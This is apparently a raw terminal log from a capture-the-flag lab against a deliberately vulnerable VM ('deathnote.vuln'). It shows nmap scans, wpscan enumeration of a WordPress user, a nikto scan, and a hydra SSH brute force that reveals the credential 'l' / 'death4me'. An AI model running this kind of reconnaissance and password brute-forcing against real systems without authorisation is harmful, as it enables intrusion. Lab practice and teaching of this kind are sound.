Starting Nmap 7.92 ( https://nmap.org ) at 2022-04-05 14:35 CST
Nmap scan report for 192.168.0.1
Host is up (0.00050s latency).
MAC Address: 24:69:8E:07:FE:4E (Shenzhen Mercury Communication Technologies)
Nmap scan report for 192.168.0.100
Host is up (0.20s latency).
MAC Address: 94:E2:3C:A7:02:C9 (Intel Corporate)
Nmap scan report for 192.168.0.103
Host is up (0.16s latency).
MAC Address: 52:43:BB:A1:BF:A7 (Unknown)
Nmap scan report for 192.168.0.105
Host is up (0.18s latency).
MAC Address: C8:94:02:0F:E5:33 (Chongqing Fugui Electronics)
Nmap scan report for earth.local (192.168.0.108)
Host is up (0.18s latency).
MAC Address: 50:01:D9:DA:FA:DD (Huawei Technologies)
Nmap scan report for 192.168.0.109
Host is up (0.0010s latency).
MAC Address: E8:6A:64:83:2C:C0 (Lcfc(hefei) Electronics Technology)
Nmap scan report for 192.168.0.111
Host is up (0.00047s latency).
MAC Address: 08:00:27:B6:FA:40 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.0.104
Host is up.
Nmap done: 256 IP addresses (8 hosts up) scanned in 6.72 seconds
$ sudo nmap -sV -sC -A 192.168.0.111
Starting Nmap 7.92 ( https://nmap.org ) at 2022-04-05 14:35 CST
Nmap scan report for 192.168.0.111
Host is up (0.00052s latency).
Not shown: 997 closed tcp ports (reset)
PORT   STATE    SERVICE VERSION
22/tcp open     ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
|   2048 5e:b8:ff:2d:ac:c7:e9:3c:99:2f:3b:fc:da:5c:a3:53 (RSA)
|   256 a8:f3:81:9d:0a:dc:16:9a:49:ee:bc:24:e4:65:5c:a6 (ECDSA)
|_  256 4f:20:c3:2d:19:75:5b:e8:1f:32:01:75:c2:70:9a:7e (ED25519)
53/tcp filtered domain
80/tcp open     http    Apache httpd 2.4.38 ((Debian))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.38 (Debian)
MAC Address: 08:00:27:B6:FA:40 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.6
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT     ADDRESS
1   0.52 ms 192.168.0.111
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.63 seconds
$ wpscan --url http://192.168.0.111/wordpress -e u
_______________________________________________________________
WordPress Security Scanner by the WPScan Team
Version 3.8.20
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[+] URL: http://192.168.0.111/wordpress/ [192.168.0.111]
[+] Started: Tue Apr 5 15:12:26 2022
Interesting Finding(s):
[+] Headers
| Interesting Entry: Server: Apache/2.4.38 (Debian)
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] XML-RPC seems to be enabled: http://192.168.0.111/wordpress/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/
[+] WordPress readme found: http://192.168.0.111/wordpress/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] Upload directory has listing enabled: http://192.168.0.111/wordpress/wp-content/uploads/
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] The external WP-Cron seems to be enabled: http://192.168.0.111/wordpress/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299
[+] WordPress version 5.8 identified (Insecure, released on 2021-07-20).
| Found By: Emoji Settings (Passive Detection)
| - http://192.168.0.111/wordpress/, Match: 'wp-includes\/js\/wp-emoji-release.min.js?ver=5.8'
| Confirmed By: Meta Generator (Passive Detection)
| - http://192.168.0.111/wordpress/, Match: 'WordPress 5.8'
[i] The main theme could not be detected.
[+] Enumerating Users (via Passive and Aggressive Methods)
Brute Forcing Author IDs - Time: 00:00:00 <====================> (10 / 10) 100.00% Time: 00:00:00
[i] User(s) Identified:
[+] kira
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register
[+] Finished: Tue Apr 5 15:12:27 2022
[+] Requests Done: 48
[+] Cached Requests: 4
[+] Data Sent: 12.469 KB
[+] Data Received: 136.091 KB
[+] Memory used: 151.547 MB
[+] Elapsed time: 00:00:00
$ nikto -host http://deathnote.vuln/wordpress
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.0.111
+ Target Hostname: deathnote.vuln
+ Target Port: 80
+ Start Time: 2022-04-05 15:13:34 (GMT8)
---------------------------------------------------------------------------
+ Server: Apache/2.4.38 (Debian)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ Uncommon header 'link' found, with contents: <http://deathnote.vuln/wordpress/index.php/wp-json/>;rel="https://api.w.org/"
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Uncommon header 'x-redirect-by' found, with contents: WordPress
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Allowed HTTP Methods: POST, OPTIONS, HEAD, GET
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ /wordpress/wp-content/plugins/akismet/readme.txt: The WordPress Akismet plugin 'Tested up to' version usually matches the WordPress version
+ /wordpress/wp-links-opml.php: This WordPress script reveals the installed version.
+ OSVDB-3092: /wordpress/license.txt: License file found may identify site software.
+ /wordpress/: A Wordpress installation was found.
+ Cookie wordpress_test_cookie created without the httponly flag
+ OSVDB-3268: /wordpress/wp-content/uploads/: Directory indexing found.
+ /wordpress/wp-content/uploads/: Wordpress uploads directory is browsable. This may reveal sensitive information
+ /wordpress/wp-login.php: Wordpress login found
+ 7785 requests: 0 error(s) and 15 item(s) reported on remote host
+ End Time: 2022-04-05 15:14:16 (GMT8) (42 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
Hydra v9.3 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-04-05 16:02:07
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 43 login tries (l:1/p:43), ~3 tries per task
[DATA] attacking ssh://192.168.0.111:22/
[22][ssh] host: 192.168.0.111 login: l password: death4me
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 3 final worker threads did not complete until end.
[ERROR] 3 targets did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2022-04-05 16:02:16